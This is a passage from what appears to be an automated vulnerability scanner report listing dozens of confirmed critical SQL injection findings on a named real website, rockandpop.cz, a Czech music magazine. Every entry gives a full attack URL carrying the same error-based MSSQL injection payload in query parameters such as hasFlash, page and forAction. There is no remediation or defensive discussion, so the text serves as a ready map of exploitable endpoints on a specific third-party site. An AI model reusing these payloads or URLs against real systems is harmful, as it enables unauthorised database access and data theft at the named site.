  337. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  338.  
  339. Severity: Critical
  340. Confirmation: Confirmed
  341. URL: http://www.rockandpop.cz/video/20-narozeniny-s-rock-pop-a-imodium/?hasFlash=true&='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  342. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  343. Parameter Name:
  344. Parameter Type: Querystring
  345. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  346.  
  347. Severity: Critical
  348. Confirmation: Confirmed
  349. URL: http://www.rockandpop.cz/recenze/green-day-uno-dos-tre/?hasFlash='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&=3
  350. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  351. Parameter Name: hasFlash
  352. Parameter Type: Querystring
  353. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  354.  
  355. Severity: Critical
  356. Confirmation: Confirmed
  357. URL: http://www.rockandpop.cz/recenze/green-day-uno-dos-tre/?hasFlash=true&='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  358. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  359. Parameter Name:
  360. Parameter Type: Querystring
  361. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  362.  
  363. Severity: Critical
  364. Confirmation: Confirmed
  365. URL: http://www.rockandpop.cz/recenze/blink-182-dogs-eating-dogs/?hasFlash='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&=3
  366. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  367. Parameter Name: hasFlash
  368. Parameter Type: Querystring
  369. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  370.  
  371. Severity: Critical
  372. Confirmation: Confirmed
  373. URL: http://www.rockandpop.cz/recenze/blink-182-dogs-eating-dogs/?hasFlash=true&='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  374. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  375. Parameter Name:
  376. Parameter Type: Querystring
  377. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  378.  
  379. Severity: Critical
  380. Confirmation: Confirmed
  381. URL: http://www.rockandpop.cz/clanky/rozhovory/?page=%27
  382. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  383. Parameter Name: page
  384. Parameter Type: Querystring
  385. Attack Pattern: %27
  386.  
  387. Severity: Critical
  388. Confirmation: Confirmed
  389. URL: http://www.rockandpop.cz/clanky/rozhovory/?hasFlash='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&=3
  390. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  391. Parameter Name: hasFlash
  392. Parameter Type: Querystring
  393. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  394.  
  395. Severity: Critical
  396. Confirmation: Confirmed
  397. URL: http://www.rockandpop.cz/clanky/rozhovory/?hasFlash=true&='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  398. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  399. Parameter Name:
  400. Parameter Type: Querystring
  401. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  402.  
  403. Severity: Critical
  404. Confirmation: Confirmed
  405. URL: http://www.rockandpop.cz/clanky/rozhovory/paul-banks:-ztotoznuji-se-s-pristupem-davida-lynche/?hasFlash='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&=3
  406. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  407. Parameter Name: hasFlash
  408. Parameter Type: Querystring
  409. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  410.  
  411. Severity: Critical
  412. Confirmation: Confirmed
  413. URL: http://www.rockandpop.cz/clanky/rozhovory/paul-banks:-ztotoznuji-se-s-pristupem-davida-lynche/?hasFlash=true&='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  414. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  415. Parameter Name:
  416. Parameter Type: Querystring
  417. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  418.  
  419. Severity: Critical
  420. Confirmation: Confirmed
  421. URL: http://www.rockandpop.cz/clanky/jak-to-slysi-parkway-drive/?hasFlash='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&=3
  422. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  423. Parameter Name: hasFlash
  424. Parameter Type: Querystring
  425. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  426.  
  427. Severity: Critical
  428. Confirmation: Confirmed
  429. URL: http://www.rockandpop.cz/clanky/jak-to-slysi-parkway-drive/?hasFlash=true&='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  430. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  431. Parameter Name:
  432. Parameter Type: Querystring
  433. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  434.  
  435. Severity: Critical
  436. Confirmation: Confirmed
  437. URL: http://www.rockandpop.cz/recenze/tribal-theory-call-me-closer/?hasFlash='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&=3
  438. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  439. Parameter Name: hasFlash
  440. Parameter Type: Querystring
  441. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  442.  
  443. Severity: Critical
  444. Confirmation: Confirmed
  445. URL: http://www.rockandpop.cz/recenze/tribal-theory-call-me-closer/?hasFlash=true&='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  446. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  447. Parameter Name:
  448. Parameter Type: Querystring
  449. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  450.  
  451. Severity: Critical
  452. Confirmation: Confirmed
  453. URL: http://www.rockandpop.cz/clanky/tashi-tomas-erml/?hasFlash='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&=3
  454. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  455. Parameter Name: hasFlash
  456. Parameter Type: Querystring
  457. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  458.  
  459. Severity: Critical
  460. Confirmation: Confirmed
  461. URL: http://www.rockandpop.cz/foto/upload/?forAction='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  462. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  463. Parameter Name: forAction
  464. Parameter Type: Querystring
  465. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  466.  
  467. Severity: Critical
  468. Confirmation: Confirmed
  469. URL: http://www.rockandpop.cz/live/akce/7526-cena-hudebnich-kritiku-apollo-2012-sasazu-praha-6-2-2013/?hasFlash='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&=3
  470. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  471. Parameter Name: hasFlash
  472. Parameter Type: Querystring
  473. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  474.  
  475. Severity: Critical
  476. Confirmation: Confirmed
  477. URL: http://www.rockandpop.cz/live/akce/7526-cena-hudebnich-kritiku-apollo-2012-sasazu-praha-6-2-2013/?hasFlash=true&='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  478. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  479. Parameter Name:
  480. Parameter Type: Querystring
  481. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  482.  
  483. Severity: Critical
  484. Confirmation: Confirmed
  485. URL: http://www.rockandpop.cz/zpravy/festivaly/?hasFlash='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&=3
  486. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  487. Parameter Name: hasFlash
  488. Parameter Type: Querystring
  489. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  490.  
  491. Severity: Critical
  492. Confirmation: Confirmed
  493. URL: http://www.rockandpop.cz/zpravy/festivaly/?hasFlash=true&='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  494. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  495. Parameter Name:
  496. Parameter Type: Querystring
  497. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  498.  
  499. Severity: Critical
  500. Confirmation: Confirmed
  501. URL: http://www.rockandpop.cz/live/akce/7032-parkway-drive-predvedli-v-praze-australskou-saunu/?hasFlash='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&=3
  502. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  503. Parameter Name: hasFlash
  504. Parameter Type: Querystring
  505. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  506.  
  507. Severity: Critical
  508. Confirmation: Confirmed
  509. URL: http://www.rockandpop.cz/live/akce/7032-parkway-drive-predvedli-v-praze-australskou-saunu/?hasFlash=true&='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  510. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  511. Parameter Name:
  512. Parameter Type: Querystring
  513. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  514.  
  515. Severity: Critical
  516. Confirmation: Confirmed
  517. URL: http://www.rockandpop.cz/live/akce/6935-muse-everything-everything-22-11-2012-praha-o2-arena/?hasFlash='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&=3
  518. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  519. Parameter Name: hasFlash
  520. Parameter Type: Querystring
  521. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  522.  
  523.  
  524. Severity: Critical
  525. Confirmation: Confirmed
  526. URL: http://www.rockandpop.cz/live/akce/6935-muse-everything-everything-22-11-2012-praha-o2-arena/?hasFlash=true&='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  527. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  528. Parameter Name:
  529. Parameter Type: Querystring
  530. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  531.  
  532. Severity: Critical
  533. Confirmation: Confirmed
  534. URL: http://www.rockandpop.cz/zpravy/festivaly/2012/?hasFlash='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&=3
  535. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  536. Parameter Name: hasFlash
  537. Parameter Type: Querystring
  538. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  539.  
  540. Severity: Critical
  541. Confirmation: Confirmed
  542. URL: http://www.rockandpop.cz/zpravy/festivaly/2012/?hasFlash=true&='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  543. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  544. Parameter Name:
  545. Parameter Type: Querystring
  546. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  547.  
  548. Severity: Critical
  549. Confirmation: Confirmed
  550. URL: http://www.rockandpop.cz/live/akce/6909-into-darkness-tour-2012/?hasFlash='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&=3
  551. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  552. Parameter Name: hasFlash
  553. Parameter Type: Querystring
  554. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  555.  
  556. Severity: Critical
  557. Confirmation: Confirmed
  558. URL: http://www.rockandpop.cz/live/akce/6909-into-darkness-tour-2012/?hasFlash=true&='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  559. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  560. Parameter Name:
  561. Parameter Type: Querystring
  562. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  563.  
  564. Severity: Critical
  565. Confirmation: Confirmed
  566. URL: http://www.rockandpop.cz/live/akce/6566-serj-tankian-rozeskakal-lucernu/?hasFlash='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&=3
  567. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  568. Parameter Name: hasFlash
  569. Parameter Type: Querystring
  570. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  571.  
  572. Severity: Critical
  573. Confirmation: Confirmed
  574. URL: http://www.rockandpop.cz/live/akce/6566-serj-tankian-rozeskakal-lucernu/?hasFlash=true&='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  575. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  576. Parameter Name:
  577. Parameter Type: Querystring
  578. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  579.  
  580. Severity: Critical
  581. Confirmation: Confirmed
  582. URL: http://www.rockandpop.cz/casopis/rock-pop-2-13/?hasFlash='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&=3
  583. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  584. Parameter Name: hasFlash
  585. Parameter Type: Querystring
  586. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  587.  
  588. Severity: Critical
  589. Confirmation: Confirmed
  590. URL: http://www.rockandpop.cz/live/akce/6545-fotky-z-koncertu-lionela-richieho/?hasFlash='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&=3
  591. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  592. Parameter Name: hasFlash
  593. Parameter Type: Querystring
  594. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  595.  
  596. Severity: Critical
  597. Confirmation: Confirmed
  598. URL: http://www.rockandpop.cz/live/akce/6545-fotky-z-koncertu-lionela-richieho/?hasFlash=true&='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  599. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  600. Parameter Name:
  601. Parameter Type: Querystring
  602. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  603.  
  604. Severity: Critical
  605. Confirmation: Confirmed
  607. URL: http://www.rockandpop.cz/live/akce/6564-niceland-michal-hruza-kapela-hruzy-andel-music-bar-plzen-24-10-2012/?hasFlash='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&=3
  608. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  609. Parameter Name: hasFlash
  610. Parameter Type: Querystring
  611. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  612.  
  613. Severity: Critical
  614. Confirmation: Confirmed
  616. URL: http://www.rockandpop.cz/live/akce/6564-niceland-michal-hruza-kapela-hruzy-andel-music-bar-plzen-24-10-2012/?hasFlash=true&='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  617. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  618. Parameter Name:
  619. Parameter Type: Querystring
  620. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  621.  
  622. Severity: Critical
  623. Confirmation: Confirmed
  624. URL: http://www.rockandpop.cz/mapa-stranek/?hasFlash='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&=3
  625. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  626. Parameter Name: hasFlash
  627. Parameter Type: Querystring
  628. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  629.  
  630. Severity: Critical
  631. Confirmation: Confirmed
  632. URL: http://www.rockandpop.cz/mapa-stranek/?hasFlash=true&='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  633. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  634. Parameter Name:
  635. Parameter Type: Querystring
  636. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  637.  
  638. Severity: Critical
  639. Confirmation: Confirmed
  640. URL: http://www.rockandpop.cz/newsletter/?hasFlash='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&=3
  641. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  642. Parameter Name: hasFlash
  643. Parameter Type: Querystring
  644. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  645.  
  646. Severity: Critical
  647. Confirmation: Confirmed
  648. URL: http://www.rockandpop.cz/newsletter/?hasFlash=true&='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  649. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  650. Parameter Name:
  651. Parameter Type: Querystring
